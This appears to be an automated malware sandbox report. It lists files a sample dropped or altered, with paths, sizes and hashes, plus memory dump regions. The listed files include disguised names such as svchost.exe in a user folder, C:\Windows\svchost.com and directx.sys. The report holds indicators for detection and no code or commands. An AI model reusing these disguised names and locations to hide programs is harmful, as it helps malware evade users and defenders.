bd9a16d8d7590a2ec827913db5173f8beb1d1ef44dab1920ef52a307f922bc14

SHA512
fe107e1c8631ec6ac94f772e6a7be1fdc2a533fe3cfcf36b1ff018c8d01bd7f1f818f0a2448f736838c953cd516ea7327c416dea20706ed2420327af8ef01abe

Download Submit
C:\PROGRA~2\COMMON~1\ADOBEA~1\Versions\1.0\ADOBEA~1.EXE

Filesize
100KB

MD5
6a091285d13370abb4536604b5f2a043

SHA1
8bb4aad8cadbd3894c889de85e7d186369cf6ff1

SHA256
909205de592f50532f01b4ac7b573b891f7e6e596b44ff94187b1ba4bcc296bb

SHA512
9696e4f60a5b1166535ca8ca3fb495d718086463d1a12fa1facc08219ad5b918208ddd2a102f7955e29153b081e05985c4ae6e4302ab36d548bb62991a47db18

Download Submit
C:\PROGRA~2\COMMON~1\Adobe\Updater6\ADOBEU~1.EXE

Filesize
130KB

MD5
7ce8bcabb035b3de517229dbe7c5e67d

SHA1
8e43cd79a7539d240e7645f64fd7f6e9e0f90ab9

SHA256
81a3a1dc3104973a100bf8d114b6be35da03767a0cbbaf925f970ffcbe5f217c

SHA512
be7fcd50b4f71b458ca001b7c019bf1169ec089d7a1ce05355134b11cbe75a5a29811f9efec803877aeb1a1d576ea2628926e0131361db23214275af6e89e80c

Download Submit
C:\PROGRA~2\COMMON~1\Adobe\Updater6\ADOBE_~1.EXE

Filesize
2.4MB

MD5
a741183f8c4d83467c51abab1ff68d7b

SHA1
ddb4a6f3782c0f03f282c2bed765d7b065aadcc6

SHA256
78be3aeb507db7e4ee7468c6b9384ee0459deebd503e06bd4988c52247ecea24

SHA512
c15dbecc0754a662892ecaff4b9b6c1bad46f710d8e1b973f86eaee467444f8e5764b31ace8f5a9a5e936947cc4dcb97cb1b14a6930c1025f38a3544393b6b18

Download Submit
C:\PROGRA~2\COMMON~1\MICROS~1\EQUATION\EQNEDT32.EXE

Filesize
571KB

MD5
d4fdbb8de6a219f981ffda11aa2b2cc4

SHA1
cca2cffd4cf39277cc56ebd050f313de15aabbf6

SHA256
ba3dc87fca4641e5f5486c4d50c09d087e65264e6c5c885fa6866f6ccb23167b

SHA512
7167e13dbcc8c96114fef5fc7ae19afa31173617db153dd283aa6d8256f6b8c09c8f906f5d418efe9f7f242cdfaef24b93c11c451701c4d56eb48d18de4e88bf

Download Submit
C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\FLTLDR.EXE

Filesize
157KB

MD5
a24fbb149eddf7a0fe981bd06a4c5051

SHA1
fce5bb381a0c449efad3d01bbd02c78743c45093

SHA256
5d13230eae7cd9b4869145c3280f7208788a8e68c9930a5c9aa3e822684a963d

SHA512
1c73b762c340a8d7ea580985ba034a404c859d814690390a6e0b6786575c219db9ca20880ea20313bb244560e36cf24e4dda90229b3084d770495f4ceedfd5de

Download Submit
C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\LICLUA.EXE

Filesize
229KB

MD5
28f7305b74e1d71409fec722d940d17a

SHA1
4c64e1ceb723f90da09e1a11e677d01fc8118677

SHA256
706db4d832abdf4907a1386b917e553315660a59bfb4c180e38215b4a606d896

SHA512
117de88d0bc437023ca2f1f54b1f2cf03b00c8cb52e4b728cabcb3140659c67cdb6d2c203d3ca13767312831c6308622dfa65d6c5361ec28aaf4ec0870f9ba6e

Download Submit
C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\MSOICONS.EXE

Filesize
503KB

MD5
3f67da7e800cd5b4af2283a9d74d2808

SHA1
f9288d052b20a9f4527e5a0f87f4249f5e4440f7

SHA256
31c10320edb2de22f37faee36611558db83b78a9c3c71ea0ed13c8dce25bf711

SHA512
6a40f4629ddae102d8737e921328e95717274cea16eb5f23bff6a6627c6047d7f27e7f6eb5cb52f53152e326e53b6ee44d9a9ee8eca7534a2f62fa457ac3d4e3

Download Submit
C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\MSOXMLED.EXE

Filesize
153KB

MD5
12a5d7cade13ae01baddf73609f8fbe9

SHA1
34e425f4a21db8d7902a78107d29aec1bde41e06

SHA256
94e8ea2ed536484492d746f6f5808192cb81ae3c35f55d60826a2db64a254dd5

SHA512
a240f5c59226749792cfb9fbd76b086d2544a493b834a72c0bfd8b076ed753ec8876ff056fc35f63f5497183d985f8f8c5c7b6abbcad70981f1ec83af1b3bd76

Download Submit
C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\OFFICE~1\ODeploy.exe

Filesize
539KB

MD5
60f6a975a53a542fd1f6e617f3906d86

SHA1
2be1ae6fffb3045fd67ed028fe6b22e235a3d089

SHA256
be23688697af7b859d62519807414565308e79a6ecac221350cd502d6bf54733

SHA512
360872d256ef91ea3debfb9b3efa22ee80859af9df29e0687c8e1b3c386d88ff1dc5635b86e714fbf1a7d4d6bc3d791efa31a9d9d13e0f79547b631bddb5108d

Download Submit
C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\OFFICE~1\Setup.exe

Filesize
1.1MB

MD5
426b3bfe5f493cf140a67b3799ac9948

SHA1
37f106a31f72dbe07e21dbffefe2b77b9b7f59e2

SHA256
2311547cc9f985e3c316fb2f90784d9f44733044d50b48f4e1e54d3c50e969c1

SHA512
f9ad8fa69a071faec825e0ddbdcae93c0667c900a6859c5ce14ccbe1e76cd6085e651e8784f07ef2b74e02e2bbec4c8b6bd979c5b298e7641d50f43b5bf0d973

Download Submit
C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\Oarpmany.exe

Filesize
205KB

MD5
da31170e6de3cf8bd6cf7346d9ef5235

SHA1
e2c9602f5c7778f9614672884638efd5dd2aee92

SHA256
7737ab500cbbd5d507881d481eef9bd91cf6650bf8d2b41b47b1a8c5f2789858

SHA512
2759d938d6ad963e0bf63481a700f7c503d06011a60bcfc1071b511e38afa87d903deb36f9cbfa0b3fd08f1ecb88d2c0bddf0d3b5f2dea2a0cca1a80471669f3

Download Submit
C:\PROGRA~2\COMMON~1\MICROS~1\SOURCE~1\OSE.EXE

Filesize
226KB

MD5
61c4eb4385ee3530cb2022fe6fc5bc45

SHA1
551c8baeb6dac4470dbaf68091ad9b864c022e90

SHA256
9cdb825851f24e29737dfa6fd3f8dc1a314956b1224c8a438e614ca8229d1dfe

SHA512
a4a4dd302df0696c43765aec07df39d1dae7e4e9db7fc2e1c4df7cdf4ad88f6026d912d3be323d92e286b6e694cba9d81a50e6f52a037e30803c38d009963c9f

Download Submit
C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE

Filesize
125KB

MD5
46e43f94482a27df61e1df44d764826b

SHA1
8b4eab017e85f8103c60932c5efe8dff12dc5429

SHA256
dc6658dec5bf89f65f2d4b9bdb27634bac0bf5354c792bc8970a2b39f535facd

SHA512
ce5bdd3f9a2394ffda83c93fc5604d972f90bd72e6aded357bdf27a2b21a0469f6ac71ce40d9fb4ed8c845468c4171a3c5b4501edbae79447c4f4e08342d4560

Download Submit
C:\Users\Admin\AppData\Local\Temp\3582-490\48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe

Filesize
888KB

MD5
fa70e7c1c0ef4a47a9f747caae5bb50d

SHA1
39243efc2aa0b10d218343e66b50eb78d884cad9

SHA256
e792b1c4655340b8b1437deaa0e039c311eab876748a79fe759cc4939921ae3d

SHA512
82a5342423261a604ff5f2154be761c39b566d05e33d03f04d7ed018c9e08f7bd494eac0c507c2dea6be336e98033e03cb33432983bc9a9aac242eae233f9437

Download Submit
C:\Users\Admin\AppData\Roaming\Hiplace.bat

Filesize
357KB

MD5
7ce6bf97872a301caaaa08b0cac03389

SHA1
992634179e565f7280a663fdc5e812500792709e

SHA256
70c41e2ee06b5ce3d613199a4b0bb9d9741753a651c1e5d279e059fe8bfa474a

SHA512
443e1bdab59dacc8e17b80ccaa64152ff53ded9c0fbcfea21acdedaf127bb80fbb132662d955110618c0d0f7e5102d7137903fa57341928e7099ef2086d0476e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\54ZSDZJNFDYVKA083FVX.temp

Filesize
7KB

MD5
545dfcd8fc1efe70ce85d5dcd35765f3

SHA1
bed75f5e10f13aa600bdfa720f393cd44bb007b5

SHA256
db2de2be6bb4f269a2a1e76b34d9d354d619c97515ab4cb350843cdc9e7530cd

SHA512
4e18123a7e43e8d13da3950eabd557e45eda7e1857f7b617b40a3e7fe26e363390e79e0dbba8a9cdee0296b4fb6d23cb583b19f37701ad3c64ac542f84ba5b47

Download Submit
C:\Users\Admin\AppData\Roaming\PORSCH~1.EXE

Filesize
168KB

MD5
ace08d279f65f6ead0421577476928b6

SHA1
d828d8dfbb543eb1db8b0e3f4430b90e50a23fbd

SHA256
bc93e49457acf3990c916a84d51916638332bf1e7d775e6ad9f240ea595a41b5

SHA512
9910dd98b435f51dca61e78c4721c10a355e288f8b466ef3a4cee71cfcd5dbd5c4beef5d0acfba11e67943a341060f0ecf0f44e793ea1df47e23f149be7cf8d1

Download Submit
C:\Users\Admin\AppData\Roaming\explorer.exe

Filesize
85KB

MD5
93ebaaade696ce603cb3dfe54ad22cda

SHA1
310c4b6325188fb2207035dc3a884a32b705ab51

SHA256
79d8747723e014945bee42bfb03e8e03e93ee2a7a25056b7e81bd61f94bc4e2c

SHA512
e77a363fd5600936cf5a375e68cd243853f67fe3fd3dc52a5a0a4248d38c9afd1c7b9b46e7a47ba9108376b0f398a39d26cf41c9716ec5fb48d00e4d6d1d7382

Download Submit
C:\Users\Admin\AppData\Roaming\svchost.exe

Filesize
72KB

MD5
c8fa0a769f8f46b26682531e8a8e47dc

SHA1
c469c639d89b2d6df36f16761a5c9844928cb7c1

SHA256
68282cfb49f1c6ae112fa5df279525aa0d0d5fb3d24554c10fee195498885ca6

SHA512
654855d8f3534017ba4ebb2ecb9d01ee46d62f565e299b2c05d9baa7b81be6af016a357367d7abb237a127320868187b2a6eb60b016a434fb80e42b27e4a79ea

Download Submit
C:\Windows\directx.sys

Filesize
228B

MD5
738a0df01c28822292058bab06fa0beb

SHA1
091210f399fb4d785137ec7eb5432c10ddca8f8d

SHA256
1d7c0c1dbf925bdd7275dd4a090a3dc1b1c9aaba45c47f347e51ae553fed7ffe

SHA512
b64aa387fe6c88b1049735a43e239d384aa08ba2adc3a66f7d2391bbf14683944829579d8ffeaf22e70fc1b763272d59e19875a55dda0c6568f7795413512bbe

Download Submit
C:\Windows\directx.sys

Filesize
212B

MD5
dfe543c85ab6f281de3f14715fd94457

SHA1
3ccf66c4a139e976fc1ec4bad6c09d214f237663

SHA256
1033fa0baef3b646ca13be7d181af142d3071133e37aec979f108074c426f968

SHA512
ea7e8ae4dbc82cd5873d09da2e7c54174045db57c28348e77935fe24e498e88a6b9803e806ec3c49dc63a7d4b02ddbf1b375c172cf4f344a6533b436f491b232

Download Submit
C:\Windows\directx.sys

Filesize
260B

MD5
72773a04bc63ad721bf795753a8b9170

SHA1
189f11ddff98586254b90cb2c0a2f57a876ca302

SHA256
25988cfa2501466a5b3b1de732fd181dda0ec633edc1c309cea857e916095f12

SHA512
8f960a07ead725b63c563a1b075d7a695696f8df15dce5c29859a54bc4b45af3d5ae5fff1dbaa39dd9598684563a0fe8c38c08435386e229182195090ea1b83a

Download Submit
C:\Windows\directx.sys

Filesize
89B

MD5
1e24fec81458cf93dcae46b76d5f24f5

SHA1
61b38f08ad8031a193b24104116f6c0bb668d651

SHA256
4468ffeb0fef4960420d58781fefb084c91817ba4d4b63f6c910084f4616ceeb

SHA512
95f5d8cc4b1f7bad27c89be012532b5c916bdf60f384737b042ac0ed6381fc61ed12775958301488a38f7369577ab4e3920bddea276504352e88d61160ce064e

Download Submit
C:\Windows\directx.sys

Filesize
133B

MD5
9d0b0a73045e37019ddbff8257b1fdaa

SHA1
251363a1c59652cfa2f8af0245a5cda57651882b

SHA256
b36f5c73f68a1079e0faf1e762ae63b620653410b3479bc46ec2e1209bb7c343

SHA512
5af739520cb92326a6189c399e5b02108e11d2cf58db4105c3ef49bbade8dc01bcfa7f3de4aafa76ecca7b8b730c4b41efa1d2664b61a84e398c4f7fddb60f11

Download Submit
C:\Windows\directx.sys

Filesize
178B

MD5
568640a8b58a8ec996f2b5676a2519db

SHA1
d11dde11666dd6f24877ac032f2cb717fa836379

SHA256
a34bc4b9e33b91e49604c2447933a691fa47b62bc8a7c8c1d17739cfbf07cf04

SHA512
5e9a173660b82702f4b458c57b432fc3668db15e208647a14a9ec9ded56a27226d3c84a6467926ceead2f3aafc9e51609153c1013e00b1de5f1eea15fcdc09c9

Download Submit
C:\Windows\svchost.com

Filesize
40KB

MD5
a88b2c5285cf3376b7657c641d5680bd

SHA1
8844222901c7c94b319d37335abfd3d3c500f98c

SHA256
5d46186ed0d3c98c37d76a9c4112220e1cf7492ff487c286e320ddc8d6abb898

SHA512
1981265e4264a13e020d3ec4b6ba356fca7907e3f92f3c33d62e80d1a456609aea755a3d810bd861840a51942ebb26b84f061ea6a8663253e06f7532d11610b5

Download Submit
\PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE

Filesize
252KB

MD5
9e2b9928c89a9d0da1d3e8f4bd96afa7

SHA1
ec66cda99f44b62470c6930e5afda061579cde35

SHA256
8899b4ed3446b7d55b54defbc1acb7c5392a4b3bc8ec2cdc7c31171708965043

SHA512
2ca5ad1d0e12a8049de885b90b7f56fe77c868e0d6dae4ec4b6f3bc0bf7b2e73295cc9b1328c2b45357ffb0d7804622ab3f91a56140b098e93b691032d508156

Download Submit
\Users\Admin\AppData\Roaming\Hiplace.exe

Filesize
79KB

MD5
d2a2f72eba0a31f8ed0194885e62b882

SHA1
437e47183840481b7b143b958763aed4d95ca593

SHA256
16538a48dc757ecfb5d67d2b4fbb0ddfb2e7fa599859cf853e44a6cf2da3359e

SHA512
bcbfe7b75593ed0f6f6071356e2a0fc3a5f57bcd2774a8ce12f7cd3c439e8ebbc847747000a9a07330391e65d2d4c3b8b71049482b3f9ad5b1bf734c6ede05d9

Download Submit
memory/1384-81-0x00000000011C0000-0x00000000011EE000-memory.dmp

Filesize
184KB

Download
memory/1624-262-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1732-139-0x000000001B410000-0x000000001B6F2000-memory.dmp

Filesize
2.9MB

Download
memory/1732-140-0x0000000002990000-0x0000000002998000-memory.dmp

Filesize
32KB

Download
memory/1928-303-0x0000000002D70000-0x00000000039BA000-memory.dmp

Filesize
12.3MB

Download
memory/1928-301-0x0000000075070000-0x00000000750D1000-memory.dmp

Filesize
388KB

Download
memory/1928-302-0x0000000075010000-0x000000007503E000-memory.dmp

Filesize
184KB

Download
memory/1944-213-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1964-220-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2000-280-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2084-368-0x0000000001280000-0x000000000129C000-memory.dmp

Filesize
112KB

Download
memory/2100-329-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2140-249-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2216-226-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2264-11-0x000007FEF5D23000-0x000007FEF5D24000-memory.dmp

Filesize
4KB

Download
memory/2264-12-0x0000000000270000-0x0000000000354000-memory.dmp

Filesize
912KB

Download
memory/2264-268-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2332-234-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2404-316-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2564-250-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2576-243-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2592-72-0x0000000000EF0000-0x0000000000F0C000-memory.dmp

Filesize
112KB

Download
memory/2600-333-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2600-337-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2760-331-0x0000000000D70000-0x0000000000D8C000-memory.dmp

Filesize
112KB

Download
memory/2764-367-0x00000000000B0000-0x00000000000CC000-memory.dmp

Filesize
112KB

Download
memory/2788-214-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2820-256-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2848-332-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2848-335-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2876-338-0x000000001A720000-0x000000001A72E000-memory.dmp

Filesize
56KB

Download
memory/2876-339-0x000000001DA00000-0x000000001DB20000-memory.dmp

Filesize
1.1MB

Download
memory/2876-363-0x000000001E8C0000-0x000000001EC10000-memory.dmp

Filesize
3.3MB

Download
memory/2876-364-0x000000001A730000-0x000000001A73E000-memory.dmp

Filesize
56KB

Download
memory/2876-82-0x0000000000F80000-0x0000000000F98000-memory.dmp

Filesize
96KB

Download
memory/3028-274-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/3064-46-0x0000000000C60000-0x0000000000C7A000-memory.dmp

Filesize
104KB

Download